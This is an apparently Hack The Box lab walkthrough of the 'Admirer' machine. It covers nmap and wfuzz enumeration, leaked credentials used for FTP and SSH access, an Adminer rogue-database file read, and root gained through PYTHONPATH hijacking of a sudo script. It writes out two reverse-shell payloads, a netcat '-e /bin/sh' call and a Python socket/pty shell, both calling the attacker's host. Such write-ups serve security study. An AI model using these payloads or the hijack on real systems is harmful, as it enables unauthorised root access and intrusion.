ADMINER WRITEUP

NMAP SCANS

    Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-31 21:19 IST
    NSE: Loaded 151 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating NSE at 21:19
    Completed NSE at 21:19, 0.00s elapsed
    Initiating NSE at 21:19
    Completed NSE at 21:19, 0.00s elapsed
    Initiating NSE at 21:19
    Completed NSE at 21:19, 0.00s elapsed
    Initiating Ping Scan at 21:19
    Scanning 10.10.10.187 [4 ports]
    Completed Ping Scan at 21:19, 0.35s elapsed (1 total hosts)
    Initiating Parallel DNS resolution of 1 host. at 21:19
    Completed Parallel DNS resolution of 1 host. at 21:19, 0.58s elapsed
    Initiating SYN Stealth Scan at 21:19
    Scanning 10.10.10.187 [1000 ports]
    Discovered open port 21/tcp on 10.10.10.187
    Discovered open port 22/tcp on 10.10.10.187
    Discovered open port 80/tcp on 10.10.10.187
    Increasing send delay for 10.10.10.187 from 0 to 5 due to 103 out of 257 dropped probes since last increase.
    Increasing send delay for 10.10.10.187 from 5 to 10 due to 140 out of 349 dropped probes since last increase.
    SYN Stealth Scan Timing: About 41.43% done; ETC: 21:20 (0:00:44 remaining)
    Completed SYN Stealth Scan at 21:22, 172.70s elapsed (1000 total ports)
    Initiating Service scan at 21:22
    Scanning 3 services on 10.10.10.187
    Completed Service scan at 21:22, 5.00s elapsed (3 services on 1 host)
    Initiating OS detection (try #1) against 10.10.10.187
    RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
    Retrying OS detection (try #2) against 10.10.10.187
    RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
    RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
    RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
    adjust_timeouts2: packet supposedly had rtt of -350641 microseconds.  Ignoring time.
    adjust_timeouts2: packet supposedly had rtt of -350641 microseconds.  Ignoring time.
    Initiating Traceroute at 21:23
    Completed Traceroute at 21:23, 2.03s elapsed
    Initiating Parallel DNS resolution of 2 hosts. at 21:23
    Completed Parallel DNS resolution of 2 hosts. at 21:23, 3.49s elapsed
    NSE: Script scanning 10.10.10.187.
    Initiating NSE at 21:23
    Completed NSE at 21:24, 50.50s elapsed
    Initiating NSE at 21:24
    Completed NSE at 21:24, 5.01s elapsed
    Initiating NSE at 21:24
    Completed NSE at 21:24, 0.00s elapsed
    Nmap scan report for 10.10.10.187
    Host is up (2.0s latency).
    Not shown: 997 closed ports
    PORT   STATE SERVICE    VERSION
    21/tcp open  tcpwrapped
    22/tcp open  tcpwrapped
    |_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
    80/tcp open  tcpwrapped
    Aggressive OS guesses: Android 4.1.1 (95%), Linux 3.2 - 4.9 (95%), Linux 3.1 (94%), Linux 3.2 (94%), Android 4.1.2 (94%), Android 4.2.2 (Linux 3.4) (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.13 (94%), Linux 4.10 (94%), Linux 4.4 (94%)
    No exact OS matches for host (test conditions non-ideal).
    Network Distance: 2 hops

    TRACEROUTE (using port 554/tcp)
    HOP RTT     ADDRESS
    1   3.83 ms 10.10.14.1
    2   3.82 ms 10.10.10.187

    NSE: Script Post-scanning.
    Initiating NSE at 21:24
    Completed NSE at 21:24, 0.00s elapsed
    Initiating NSE at 21:24
    Completed NSE at 21:24, 0.00s elapsed
    Initiating NSE at 21:24
    Completed NSE at 21:24, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 288.03 seconds
            Raw packets sent: 4389 (197.784KB) | Rcvd: 3533 (159.868KB)


PORT 80

Let's move on to robots.txt.

Here we have admin-dir available, which returns Forbidden. After fuzzing it I got 2 directories:

Contacts


    ##########
    # admins #
    ##########
    # Penny
    Email: p.wise@admirer.htb


    ##############
    # developers #
    ##############
    # Rajesh
    Email: r.nayyar@admirer.htb

    # Amy
    Email: a.bialik@admirer.htb

    # Leonard
    Email: l.galecki@admirer.htb



    #############
    # designers #
    #############
    # Howard
    Email: h.helberg@admirer.htb

    # Bernadette
    Email: b.rauch@admirer.htb

Credentials


    [Internal mail account]
    w.cooper@admirer.htb
    fgJr6q#S\W:$P

    [FTP account]
    ftpuser
    %n?4Wz}R$tTF7

    [Wordpress account]
    admin
    w0rdpr3ss01!

Here we got the FTP user and password!

FTP LOGINS AND ENUMERATION

    root@liquid:~/Desktop/HTB/admirerC# ftp 10.10.10.187
    Connected to 10.10.10.187.
    220 (vsFTPd 3.0.3)
    Name (10.10.10.187:root): ftpuser
    331 Please specify the password.
    Password:
    230 Login successful.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> dir
    200 PORT command successful. Consider using PASV.
    150 Here comes the directory listing.
    -rw-r--r--    1 0        0            3405 Dec 02 21:24 dump.sql
    -rw-r--r--    1 0        0         5270987 Dec 03 21:20 html.tar.gz
    226 Directory send OK.
    ftp> get *
    local: credentials.txt remote: *
    200 PORT command successful. Consider using PASV.
    550 Failed to open file.
    ftp> mget *
    mget dump.sql? 
    mget html.tar.gz? 

Here we have two files available. After checking both, here is what we got:

html directory (extracted from html.tar.gz)

    root@liquid:~/Desktop/HTB/admirerC/html# ls -la
    total 36
    drwxr-xr-x 6 root root     4096 May  5 17:52 .
    drwxr-xr-x 3 root root     4096 May 29 15:15 ..
    drwxr-x--- 6 root www-data 4096 Jun  7  2019 assets
    drwxr-x--- 4 root www-data 4096 Dec  3 01:59 images
    -rw-r----- 1 root www-data 4613 Dec  4 01:50 index.php
    -rw-r----- 1 root www-data  134 Dec  2 03:01 robots.txt
    drwxr-x--- 2 root www-data 4096 Dec  2 23:20 utility-scripts
    drwxr-x--- 2 root www-data 4096 Dec  2 22:55 w4ld0s_s3cr3t_d1r

The utility-scripts directory is interesting.

After going through it we got another web directory to check.

utility-scripts

    root@liquid:~/Desktop/HTB/admirerC/html/utility-scripts# ls -l
    total 16
    -rw-r----- 1 root www-data 1795 Dec  2 23:18 admin_tasks.php
    -rw-r----- 1 root www-data  401 Dec  2 03:58 db_admin.php
    -rw-r----- 1 root www-data   20 Nov 30  2019 info.php
    -rw-r----- 1 root www-data   53 Dec  2 23:10 phptest.php

We have a number of files here, some of them containing passwords. But the main thing we learn here is that there is a database on this box!

Let's fuzz for more files under utility-scripts:

    root@liquid:~/Desktop/HTB/admirerC/html/utility-scripts# wfuzz -w /usr/share/wordlists/big.txt -u http://admirer.htb/utility-scripts/FUZZ.FUZ2Z -z list,php --hc 403,404  -c

    Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzzs documentation for more information.

    ********************************************************
    * Wfuzz 2.4 - The Web Fuzzer                           *
    ********************************************************

    Target: http://admirer.htb/utility-scripts/FUZZ.FUZ2Z
    Total requests: 20592

    ===================================================================
    ID           Response   Lines    Word     Chars     Payload                                      
    ===================================================================

    000001873:   200        51 L     235 W    4156 Ch     "adminer - php"  

Here we got adminer.php.

Now we need an exploit!

After some google-fu I found a website:

https://www.foregenix.com/blog/serious-vulnerability-discovered-in-adminer-tool

Here we have the exploit for Adminer!

For that we need to create a MySQL user and a database of its own on our own machine.

Here is the link for creating the user and database:

https://www.digitalocean.com/community/tutorials/how-to-create-a-new-user-and-grant-permissions-in-mysql

After creating the database we can log in like this:

    root@liquid:~/Desktop/HTB/admirerC# mysql -u new adminer -p
    Enter password: 
    Reading table information for completion of table and column names
    You can turn off this feature to get a quicker startup with -A

    Welcome to the MariaDB monitor.  Commands end with ; or \g.
    Your MariaDB connection id is 59
    Server version: 10.3.22-MariaDB-1 Debian buildd-unstable

    Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

    Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

    MariaDB [adminer]> 

Then log in to adminer.php using that database.

Let's try to access the /etc/passwd file!

But we will get a "Path" error.

So let's try to access index.php, which was just one directory back.

Here we go!

Again we got some passwords!

SSH WALDO USER ACCESS

    root@liquid:~/Desktop/HTB/admirerC# ssh waldo@10.10.10.187
    waldo@10.10.10.187's password: 
    Linux admirer 4.9.0-12-amd64 x86_64 GNU/Linux

    The programs included with the Devuan GNU/Linux system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.

    Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
    permitted by applicable law.
    You have mail.
    Last login: Sun May 31 17:18:37 2020 from 10.10.14.185
    waldo@admirer:~$ id
    uid=1000(waldo) gid=1000(waldo) groups=1000(waldo),1001(admins)

GETTING ROOT ACCESS

Let's use the basic command to check:

    waldo@admirer:~$ sudo -l
    [sudo] password for waldo: 
    Matching Defaults entries for waldo on admirer:
        env_reset, env_file=/etc/sudoenv, mail_badpass,
        secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
        listpw=always

    User waldo may run the following commands on admirer:
        (ALL) SETENV: /opt/scripts/admin_tasks.sh
    waldo@admirer:~$ 

After running that script and reading it with cat, I came to know that it runs every option available. In that directory we have 2 files:

    waldo@admirer:/opt/scripts$ ls -l
    total 8
    -rwxr-xr-x 1 root admins 2613 Dec  2 20:36 admin_tasks.sh
    -rwxr----- 1 root admins  198 Dec  2 20:36 backup.py
    waldo@admirer:/opt/scripts$

Here we see that the backup file runs the function make_archive, which it imports from shutil, a Python library. This backup file backs up the web part as option 6. What if we add our own library path containing our own library named shutil? The backup would then run using the library we just made as a reverse shell, which will be executed by root, as the script is owned by root.

    waldo@admirer:~/liquid$ cat shutil.py 
    import os

    def make_archive(a,s,d):
        os.system("nc 10.10.14.140 9003 -e /bin/sh")
    waldo@admirer:~/liquid$ 

Now let's add this path to PYTHONPATH and run the script!

But remember to open the listener first!

    waldo@admirer:~/liquid$ sudo PYTHONPATH=~/liquid /opt/scripts/admin_tasks.sh 

    [[[ System Administration Menu ]]]
    1) View system uptime
    2) View logged in users
    3) View crontab
    4) Backup passwd file
    5) Backup shadow file
    6) Backup web data
    7) Backup DB
    8) Quit
    Choose an option: 6
    Running backup script in the background, it might take a while...

Here we got root access!


    root@liquid:~/Desktop/HTB/admirer# nc -lnvp 9002
    listening on [any] 9002 ...
    connect to [10.10.14.140] from (UNKNOWN) [10.10.10.187] 46778
    root@admirer:/home/waldo/liquid# cd
    cd
    root@admirer:~# id 
    id 
    uid=0(root) gid=0(root) groups=0(root)
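As an added illustration (not from the original writeup) of why a sudo rule with SETENV on a script that calls Python is dangerous: the snippet below, assumed to run on any Python 3.7+, drops a harmless stand-in shutil.py into a temporary directory, points PYTHONPATH at it and reports whether a child interpreter imported the stand-in instead of the standard library. Running the child with -I (or -E) is the fix, since those flags make the interpreter ignore PYTHONPATH.

```python
import os
import subprocess
import sys
import tempfile
import textwrap

# Constructed stand-in module (assumption for this demo): it only records that
# it was loaded and offers a dummy make_archive; it does nothing else.
SHADOW_SOURCE = textwrap.dedent("""\
    SHADOWED = True
    def make_archive(*args, **kwargs):
        return "shadowed make_archive"
""")

# Probe run inside the child interpreter: which shutil did "import shutil" find?
PROBE = "import shutil; print(getattr(shutil, 'SHADOWED', False))"


def shadow_wins(interpreter_flags=()):
    """Start a child Python with PYTHONPATH pointing at a directory that holds a
    fake shutil.py. Returns True if the fake module shadowed the stdlib one.
    Pass ("-I",) or ("-E",) to see the hardened invocation ignore PYTHONPATH."""
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "shutil.py"), "w") as f:
            f.write(SHADOW_SOURCE)
        env = dict(os.environ, PYTHONPATH=d)  # what SETENV lets a sudoer set
        cmd = [sys.executable, *interpreter_flags, "-c", PROBE]
        out = subprocess.run(cmd, env=env, capture_output=True, text=True, check=True)
        return out.stdout.strip() == "True"


if __name__ == "__main__":
    print("default interpreter imports the fake shutil:", shadow_wins())
    print("python -I imports the fake shutil:", shadow_wins(("-I",)))
    print("python -E imports the fake shutil:", shadow_wins(("-E",)))
```

The same outcome can be reached from the sudoers side by dropping the SETENV tag, so that sudo's env_reset strips PYTHONPATH before the script starts.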

NOTE: here we can use another Python script to get a shell, as I did above:

    waldo@admirer:~/liquid$ cat shutil1.py 
    import os
    import pty
    import socket

    lhost = "10.10.14.140"
    lport = 9002

    ZIP_DEFLATED = 0

    class ZipFile:
        def close(*args):
            return

        def write(*args):
            return

        def __init__(self, *args):
            return

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((lhost, lport))
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    os.putenv("HISTFILE",'/dev/null')
    pty.spawn("/bin/bash")
    s.close()

HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE
